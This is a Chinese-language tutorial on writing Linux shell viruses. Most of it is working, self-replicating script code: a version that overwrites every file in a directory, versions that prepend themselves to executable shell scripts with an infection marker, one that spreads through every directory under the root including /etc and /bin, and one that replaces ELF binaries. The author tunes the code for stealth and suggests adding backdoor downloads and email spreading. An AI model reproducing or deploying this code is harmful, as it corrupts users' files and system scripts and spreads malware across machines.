主要的shell病毒技術(shù)
　　-------------------
　　當(dāng)然，本文需要你至少了解linux shell編程的基礎(chǔ)知識和一星點(diǎn)的病毒知識。
　　ok！我們進(jìn)入正題！
　　我們來看一個最原始的shell病毒，代碼最能說明問題：
　　---------------------------------------------------------
　　#shellvirus I
　　for file in *
　　do
　　cp $0 $file
　　done
　　---------------------------------------------------------
　　簡單吧？遍歷當(dāng)前文件系統(tǒng)的所有文件，然后覆蓋所有文件。但是，我們知道linux是多用戶的操作系統(tǒng)，它的文件是具有
　　保護(hù)模式的，所以以上的腳本有可能會報(bào)出一大堆的錯誤，所以它很快就會被管理員發(fā)現(xiàn)并制止它的傳染。所以我們可以
　　為該腳本做個判斷，這樣隱蔽性就大大增強(qiáng)了：
　　---------------------------------------------------------
　　#shellvirus II
　　for file in *
　　do
　　if test -f $file
　　then
　　if test -x $file
　　then
　　if test -w $file
　　then
　　if grep -s echo $file 》.mmm
　　then
　　cp $0 $file
　　fi; fi; fi; fi; fi
　　done
　　rm .mmm -f
　　---------------------------------------------------------
　　ok.我們改進(jìn)了一下，加了若干的判斷，判斷文件是否存在，是否文件可執(zhí)行，是否我們有權(quán)限寫，再判斷它是否是腳本程序
　　如果是就cp $0 $file，所以這段代碼是感然該系統(tǒng)所有的腳本程序的，危害性還是比較大的.if grep -s echo $file》/.mmm
　　這句也可以這樣寫：if file $file | grep -s ‘Bourne shell script’ 》 /dev/nul ; then，也就是判斷file是否為shell
　　腳本程序。
　　但是，腳本病毒一旦在感染完畢之后就什么也不做了，它沒有象二進(jìn)制病毒那樣的潛伏的危害性，而且以上的腳本只是簡
　　單的覆蓋宿主而已，所以我這里利用了一下傳統(tǒng)的二進(jìn)制病毒的感染機(jī)制，效果也不錯，看看下面代碼：
　　---------------------------------------------------------
　　#infection
　　head -n 24 $0 》 .test　　　　《-取自身保存到.test
　　for file in *　　　　　　《-遍歷文件系統(tǒng)
　　do
　　if test -f $file　　　　《-判斷是否為文件
　　then
　　if test -x $file　　　　《-判斷文件是否可執(zhí)行
　　then
　　if test -w $file　　《-判斷文件是否可寫
　　then
　　if grep -s echo $file 》.mmm　　《-判斷是否為腳本程序
　　then
　　head -n 1 $file 》.mm　　　　《-提取要感染的腳本程序的第一行
　　if grep -s infection .mm 》.mmm　　《-判斷該文件是否已經(jīng)被感染
　　then
　　rm -f .mm　　　　　　《-已經(jīng)被感染，則跳過
　　else　　　　　　　　《-還未被感染
　　cat $file 》 .SAVEE　　　　《-很熟悉吧？借用了傳統(tǒng)的二進(jìn)制文件的感染機(jī)制
　　cat .test 》 $file
　　cat .SAVEE 》》 $file
　　fi; fi; fi; fi; fi
　　done
　　rm .test .SAVEE .mmm .mm -f
　　--------------------------------------------------------
　　程序的注解足以說明了，其實(shí)增加了潛伏的危害性，但還是特容易被發(fā)現(xiàn)，沒辦法的事情，shell腳本一般都是明文的，呵呵。不過
　　危害性已經(jīng)相當(dāng)大了。這段程序用了一個感染標(biāo)志：infection來判斷是否已經(jīng)被感染，著在程序中可以反應(yīng)出來。
　　ok，為了使上面的代碼不容易被發(fā)現(xiàn)，我必須優(yōu)化它，最先考慮的肯定是精練代碼：
　　--------------------------------------------------------
　　#infection
　　for file in * ;　do
　　if test -f $file && test -x $file && test -w $file ; then
　　if grep -s echo $file 》 /dev/nul ; then
　　head -n 1 $file 》.mm
　　if grep -s infection .mm 》 /dev/nul ; then
　　rm .mm -f ; else
　　cat $file 》 .SAVEE
　　head -n 13 $0 》 $file
　　cat .SAVEE 》》 $file
　　fi; fi; fi
　　done
　　rm .SAVEE .mm -f
　　--------------------------------------------------------
　　現(xiàn)在只有兩個臨時文件的產(chǎn)生了，代碼也被精簡到了13行。當(dāng)然可以完全用;來把代碼甚至寫到1-2行，但這里我只是說明問題，就
　　不寫出來了。
　　好，我們看看，shell病毒還能做哪些有用的事情，有可能我們想感染別的目錄的文件，比如根目錄或者是/etc，/bin等等，因?yàn)榇蠖?br /> 　　數(shù)有用的系統(tǒng)配置腳本都存放在那些目錄下，只要對上述代碼稍作改動就可以實(shí)現(xiàn)了
　　--------------------------------------------------------
　　#infection
　　xtemp=$pwd　　　　　　　　《-保存當(dāng)前路徑
　　head -n 22 $0 》 /.test
　　for dir in /* ; do　　　　　　《-遍歷/目錄
　　if test -d $dir ; then　　　　《-如果是目錄就cd該目錄
　　cd $dir
　　for file in * ; do　　　　　　《-遍歷該目錄文件
　　if test -f $file && test -x $file && test -w $file ; then　　《-確定文件是否可執(zhí)行，可寫
　　if grep -s echo $file 》 /dev/nul ; then　　　　　　《-確定是否為腳本程序
　　head -n 1 $file 》 .mm
　　if grep -s infection .mm 》 /dev/nul ; then　　　　《-確定是否已經(jīng)被感染
　　rm .mm -f ; else
　　cat $file 》 /.SAVEE　　　　　　　　《-和前面的感染機(jī)制一樣感染未被感染的腳本程序
　　cat /.test 》 $file
　　cat /.SAVEE 》》 $file
　　fi; fi; fi
　　done
　　cd 。.
　　fi
　　done
　　cd $xtemp　　　　《-返回原目錄
　　rm /.test /.SAVEE .mm -f
　　-------------------------------------------------------------
　　其實(shí)這段代碼只感染了/目錄下的一層目錄。當(dāng)然我們可以使它感染的更深，只是加幾個循環(huán)而已。同樣shell病毒可以做很多事情
　　如download后門程序，為機(jī)器自動開后門，主動去攻擊聯(lián)網(wǎng)的其他機(jī)器，取用戶的email來發(fā)送傳染等等?？傊膶?shí)現(xiàn)技術(shù)不高深，
　　但也比較實(shí)用，還是值得去說明一下的，呵呵。
　　同樣，我們也可以感染elf文件，但危害性很小，這里不重點(diǎn)講，給個例程大家理解一下吧
　　-------------------------------------------------------------
　　for file in * ;　do
　　if test -f $file && test -x $file && test -w $file ; then
　　if file $file | grep -s ‘ELF’ 》 /dev/nul ; then
　　mv $file .$file
　　head -n 9 $0 》 $file
　　fi; fi
　　done
　　.$0
?